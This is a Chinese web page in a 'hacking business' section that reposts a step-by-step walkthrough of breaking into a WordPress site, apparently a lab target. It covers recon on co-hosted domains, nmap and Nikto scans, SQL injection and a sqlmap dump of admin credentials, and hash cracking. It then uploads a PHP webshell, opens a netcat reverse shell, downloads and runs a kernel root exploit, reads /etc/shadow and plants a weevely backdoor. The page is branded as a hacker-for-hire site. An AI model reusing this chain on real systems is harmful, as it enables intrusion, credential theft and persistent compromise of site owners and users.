当前位置:首页 > 黑客业务 > 正文内容

web渗透技术入侵网站(web渗透漏洞)

hacker3年前 (2022-07-15)黑客业务103

  【新朋友】点击标题下面蓝字「皮鲁安全之家」关注  【老朋友】点击右上角,分享或收藏本页精彩内容  【公众号】搜索公众号:皮鲁安全之家,或者ID :piluwill

问题的答案看起来不那么确定,显而易见的是黑掉一个站点有很多种方法。在这篇文章,我们的目标是要给大家展示一下黑客是如何锁定并黑掉一个目标站点的!

让我们来看看目标站点:hack-test.com

先ping下站点所在服务器的IP:

现在我们有了目标站点所在服务器的IP了 — 173.236.138.113

web渗透技术入侵网站(web渗透漏洞)

然后我们可以找找同个IP上的其他站点(旁站:sameip.org):

展开全文

Same IP 26 sites hosted on IP Address 173.236.138.113

ID

Domain

Site Link

1

hijackthisforum.com

hijackthisforum.com

2

sportforum.net

sportforum.net

3

freeonlinesudoku.net

freeonlinesudoku.net

4

cosplayhell.com

cosplayhell.com

5

videogamenews.org

videogamenews.org

6

gametour.com

gametour.com

7

qualitypetsitting.net

qualitypetsitting.net

8

brendanichols.com

brendanichols.com

9

8ez.com

8ez.com

10

hack-test.com

hack-test.com

11

kisax.com

kisax.com

12

paisans.com

paisans.com

13

mghz.com

mghz.com

14

debateful.com

debateful.com

15

jazzygoodtimes.com

jazzygoodtimes.com

16

fruny.com

fruny.com

17

vbum.com

vbum.com

18

wuckie.com

wuckie.com

19

force5inc.com

force5inc.com

20

virushero.com

virushero.com

21

twincitiesbusinesspeernetwork.com

twincitiesbusinesspeernetwork.com

22

jennieko.com

jennieko.com

23

davereedy.com

davereedy.com

24

joygarrido.com

joygarrido.com

25

prismapp.com

prismapp.com

26

utiligolf.com

utiligolf.com

总计有26个站点在[173.236.138.113]这台服务器上。为了黑掉目标站点,许多黑客会把目标站点同服的其他站点也划入攻击范围内。但是出于学习的目的,我们今天暂且将其他站点放在一边。

我们需要更多关于目标站点的信息(Ps:笔者认为在渗透测试过程中,这比实施测试的环节来得重要得多。),他们包括:

1.DNS记录(A,NS,TXT,MX)

2.WEB服务类型(IIS,APACHE,TOMCAT)

3.域名注册者的信息(所持有域名公司等)

4.目标站点管理员(相关人员)的姓名,电话,邮箱和住址等

5.目标站点所支持的脚本类型(PHP,ASP,JSP,ASP.net,CFM)

6.目标站点的操作系统(UNIX,LINUX,WINDOWS,SOLARIS)

7.目标站点开放的端口

让我们先来查询相关DNS记录吧,这里用的是 who.is:

目标站点DNS记录信息:

Record

Type

TTL

Priority

Content

hack-test.com

A

4 hours

173.236.138.113 ()

hack-test.com

SOA

4 hours

ns1.dreamhost.com. hostmaster.dreamhost.com. 2011032301 15283 1800 1814400 14400

hack-test.com

NS

4 hours

ns1.dreamhost.com

hack-test.com

NS

4 hours

ns3.dreamhost.com

hack-test.com

NS

4 hours

ns2.dreamhost.com

www.hack-test.com

A

4 hours

173.236.138.113 ()

同时确认WEB服务的类型:

显而易见是Apache ,稍后我们将确定其版本:

HACK-TEST.COM SITE INFORMATION

IP: 173.236.138.113

Website Status: active

Server Type: Apache

Alexa Trend/Rank: 1 Month: 3,213,968 3 Month: 2,161,753 Page Views per Visit: 1 Month: 2.0 3 Month: 3.7

现在是时候来查询目标站点持有人(也许可能就是管理员)信息了:

现在我们有了管理员的一些相关信息了,祭出Backtrack5中的神器 Whatweb 来确认操作系统和WEB服务版本信息:

Now we found that your site is using a famous php called WordPress, that your server os is Fedora Linux and that your web server version is (apache 2.2.15), let’s find open ports in your server.

现在我们知道,目标站点使用了用PHP编写的非常出名的开源博客系统WordPress,并且是跑在Fedora的Linux发行版上的,Apache版本是2.2.15。接下来让我们看看目标站点服务器开了哪些端口:

祭出神器Nmap

1 – 获取目标服务器开放的服务

root@bt:/ # nmap -sV hack-test.comStarting Nmap 5.59BETA1 ( http: //nmap.org ) at 2011-12-28 06:39 EETNmap scan report forhack-test.com ( 192.168.1.2) Host isup ( 0.0013s latency). Not shown: 998filtered ports PORT STATE SERVICE VERSION 22/tcp closed ssh 80/tcp open http Apache httpd 2.2.15((Fedora)) MAC Address: 00: 0C: 29: 01: 8A: 4D (VMware) Service detection performed. Please report any incorrect results at http: //nmap.org/submit/ .Nmap done: 1IP address ( 1host up) scanned in11.56seconds

2 – 获取目标服务器操作系统

root@bt:/ # nmap -O hack-test.com Starting Nmap 5.59BETA1 ( http: //nmap.org ) at 2011-12-28 06:40 EETNmap scan report forhack-test.com ( 192.168.1.2) Host isup ( 0.00079s latency). Not shown: 998filtered ports PORT STATE SERVICE 22/tcp closed ssh 80/tcp open http MAC Address: 00: 0C: 29: 01: 8A: 4D (VMware) Device type: general purpose Running: Linux 2.6.X OS details: Linux 2.6.22(Fedora Core 6) Network Distance: 1hop OS detection performed. Please report any incorrect results at http: //nmap.org/submit/ .Nmap done: 1IP address ( 1host up) scanned in7.42seconds

啊哦!~只开了80,而且是 Fedora Core 6 Linux内核版本为2.6.22

现在我们已经收集了很多关于目标站点的重要信息了。让我们扫扫他的漏洞吧。(Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF,等等.)

让我们先试试 Nakto.pl 来扫扫,没准能搞出点漏洞来

root@bt:/pentest/web/nikto# perl nikto.pl -h http://hack-test.com

- Nikto v2.1.4

—————————————————————————

+ Target IP: 192.168.1.2 + Target Hostname: hack-test.com + Target Port: 80 + Start Time: 2011-12-29 06:50:03

—————————————————————————

+ Server: Apache/2.2.15 (Fedora) + ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b + Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + 6448 items checked: 1 error(s) and 6 item(s) reported on remote host + End Time: 2011-12-29 06:50:37 (34 seconds)

—————————————————————————

同时试试Wa3f(Ps:哦哇谱死的开源项目,很不错的说~)

root @bt:/pentest/web/w3af# ./w3af_gui Startingw3af, running on:Pythonversion:2.6. 5( r265:79063, Apr162010, 13:57:41) [ GCC4.4. 3] GTKversion:2.20. 1PyGTKversion:2.17. 0w3af - WebApplicationAttackandAuditFrameworkVersion:1.2Revision:4605Author:AndresRianchoandthe w3af team.

图形界面的扫描方式,写入URL即可。

用以前给杂志社投稿的语气说,泡杯茶的功夫,等待扫描结束并查看结果。

你可以看到很多漏洞信息鸟~先试试SQL注入。

url – http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220 然后 Exploit it!

发现其他漏洞测试失败,用SQLMap进行脱裤吧(猜解数据库并保存目标站点相关信息到本地) Dump it!

sqlmap -u url

过一小会儿能见到如下信息

按n并回车后你可以看到

哦也~显错方式的注入点,而且爆出的 Mysql的版本信息

用sqlmap取得所有库,参数 -dbs

找到三个库

查Wordpress的库中所有表,参数 -D wordpress -tables

然后是列名(这里需要你自己熟悉敏感信息存在哪个表中呢),参数 -T wp_users -columns

22个字段(列)

web渗透技术入侵网站(web渗透漏洞)

然后查数据,参数 -C user_login,user_pass –dump

然后解密管理员的hash,这里用的是 http://www.onlinehashcrack.com/free-hash-reverse.php

明文密码是q1w2e3(和 csdn库的密码排行榜 有得一拼,哈哈~),然后登入后台拿webshell了。

Get in!~

来传个PHP的webshell吧~这里用的编辑插件拿shell的方法(见我以前写的tips,方法有很多哦~)

牛b。保存就可以了。然后访问就可以看到可爱的webshell了。

灰阔都知道,接下来要提权了。用反弹来获取一个交互式的shell。

本地用nc监听(不得不说经典就是经典啊~)

连上之后

输点Linux命令试试火候

id uid=48(apache) gid=489(apache) groups=489(apache)

pwd /var/www/html/Hackademic_RTB1/wp-content/plugins

uname -a Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux

命令作用我就不翻译了。获取了内核版本,我们可以到 exploit-db.com 来寻找相关的exp进行权限的提升。

老外都是用wget下载的,国内灰阔们呢?

wget http://www.exploit-db.com/down load/15285-O roro.c --2011-12-2800:48:01-- http://www.exploit-db.com/download/15285Resolving www.exploit-db.com... 199.27.135.111, 199.27.134.111Connecting towww.exploit-db.com|199.27.135.111|:80... connected. HTTP request sent, awaiting response... 301Moved Permanently Location: http://www.exploit-db.com/download/15285/ [following] --2011-12-2800:48:02-- http://www.exploit-db.com/download/15285/ Connecting towww.exploit-db.com|199.27.135.111|:80... connected. HTTP request sent, awaiting response... 200OK Length: 7154(7.0K) [application/txt] Saving to: `roro.c' 0K ...... 100% 29.7K=0.2s

代码我不贴了。用gcc编译exp gcc roro.c -o roro ,编译并且执行exp。

./roro [*] Linux kernel >= 2.6.30 RDS socket exploit [*] by Dan Rosenberg [*] Resolving kernel addresses... [+] Resolved rds_proto_ops to 0xe09f0b20 [+] Resolved rds_ioctl to 0xe09db06a [+] Resolved commit_creds to 0xc044e5f1 [+] Resolved prepare_kernel_cred to 0xc044e452 [*] Overwriting function pointer... [*] Linux kernel >= 2.6.30 RDS socket exploit [*] by Dan Rosenberg [*] Resolving kernel addresses... [+] Resolved rds_proto_ops to 0xe09f0b20 [+] Resolved rds_ioctl to 0xe09db06a [+] Resolved commit_creds to 0xc044e5f1 [+] Resolved prepare_kernel_cred to 0xc044e452 [*] Overwriting function pointer... [*] Triggering pay load... [*] Restoring function pointer...

淡定,敲个id试试,你可以发现 root it!

现在可以查看shadow和passwd了~(我只截了部分)

cat /etc/shadow

root:$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9VY6HyGkXcLEO.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7:::

我们可以使用 John the ripper 来破哈希。但是我们不会这么做,通常我们会留下一个后门(权限巩固),这样就可以随时涂掉他首页了(hv a joke.)。

我们用bt5中的weevely来上传一个带密码保护的PHP的webshell。

1 – weevely的相关选项

root @bt:/pentest/backdoors/web/weevely# ./main.py - Weevely0. 3- Generateandmanage stealth PHPbackdoors. Copyright(c) 2011- 2012WeevelyDevelopersWebsite:http:/ /code.google.com/p/weevely/Usage:main.py [options] Options:-h, --help show this help message andexit -g, --generate Generatebackdoor crypted code, requires -o and-p . -o OUTPUT, --output= OUTPUTOutputfilename forgenerated backdoor . -c COMMAND, --command= COMMANDExecutea single command andexit, requires -u and-p . -t, --terminal Starta terminal-like session, requires -u and-p . - CCLUSTER, --cluster= CLUSTERStartincluster mode reading items from the give file, inthe form 'label,url,password'where label is optional. -p PASSWORD, --password= PASSWORDPasswordof the encrypted backdoor . -u URL, --url= URLRemotebackdoor URL.

2 – 用它来创建一个PHP的webshell

root @bt:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p koko Weevely0. 3- Generateandmanage stealth PHPbackdoors. Copyright(c) 2011- 2012WeevelyDevelopersWebsite:http:/ /code.google.com/p/weevely/+ Backdoorfile 'hax.php'created with password 'koko'.

3 – 上传

我们现在可以用weevely连接并操控他了。

测试(其实就相当于一句话马差不多的..)

总结:

老外的行文方式还不错,很好的渗透流程,很标准的科普文~~

原文: http://resources.infosecinstitute.com/hacking-a-wordpress-site 《Targeting and Hacking a WordPress Site》 @ Chinadu's Blog

回复

  获得以下图文等信息

论坛

  可进入微论坛畅谈

任意

  官方机器人陪聊

首页

  查看技术文档(逐步更新中)

留言

  进入留言板

相册

  国内外大牛真容

扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:https://therlest.com/129229.html

分享给朋友:

“web渗透技术入侵网站(web渗透漏洞)” 的相关文章

什么时候立秋

很快就要到大暑了,之后的节气就是立秋,可能很多人会觉得立秋应该就会进入秋天,天气清爽舒服了,但事实不是这样的,秋天来了还有一个很让人害怕的秋老虎,那大家知道什么时候立秋以及几号立秋吗,接下来大家就随百思特小编一起了解看看~   2020立秋是几月几日 2020年...

蜂胶多少钱一瓶是真的(蜂胶五毒膏多少钱一只)

之前听说这客户有糖尿病,蜂胶就是物稀价贵,变成日常可以食用的营养品。 我经常买的澳佳宝的120左右220粒。如果是纯蜂蜜的话,一般是100-300之间的,59块钱一瓶,在100~300是左右不等,总钱黄酮大于4000mg/100g的含量,一定要注意通过正规的渠道购买,我只知道麦金利的。 蜂胶软胶囊价...

书黑客,黑客软件破解吃鸡,网站黑客攻击工具

关于较新版别的Windbg,官网已不再支撑独自下载,只能经过Windows SDK里边勾选来装置,不过装置之后Redist目录会有x64/x86/arm的装置包,也可独立装置。 此次评选活动的意图在于,在安全社区中宣扬这些技能,让职业进步对安全的注重,一起也能让这些技能能遭到认可和铭记。 因而,根据...

intense靶场-获取User权限

出品|MS08067实验室(www.ms08067.com) 本文作者:jokelove(Ms08067内网安全小组成员) Intense是HTB中一个难度中上的靶场,需要参与者具备下述能力: 1. Python源码审计 2. SQL注入原理 3. SNMP远程命令执行 4. 栈溢出...

全球最大黑客组织匿名者「公司被黑客攻击要求汇比特币怎么办」

⒈匿名者黑客组织匿名者黑客组织是世界最大的黑客组织,也是世界最大的政治意识黑客组织。其关键遍布于美国,次之为欧洲国家,非州、南美洲、亚洲地区等地都是有其各分部。“匿。 ⒉世界上最大黑客组织匿名者向IS开战 匿名者是啥机构 - 百度搜索。是一个黑客组织,你能了解为一群很牛逼的计算机网大神。 ⒊匿名...

天气冷注意保暖的句子 天气冷注意保暖的问候语

气温逐渐转冷,能够根据朋友圈说说的方式提示亲戚朋友注意保暖,或是给老人发短信问候语,立即的增加衣服留意身心健康,产生天冷注意保暖的语句。 天冷注意保暖的问侯 1. 冬季那麼冷,我想要一个溫暖的被子,不容易断开连接的wifi,再再加上吃剩的零食,假如这种都不能,那是否可以使给我一个你。 2. 冬...

评论列表

边侣神择
3年前 (2022-07-15)

om 17 vbum.com vbum.com 18 wuckie.com wuckie.com 19 force5inc.com force5inc.com 20 vi

俗野卿绡
3年前 (2022-07-15)

s... [+] Resolved rds_proto_ops to 0xe09f0b20 [+] Resolved rds_ioctl to 0xe09db06a [+] Resolved commit_creds to 0xc044e5f1 [+]

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。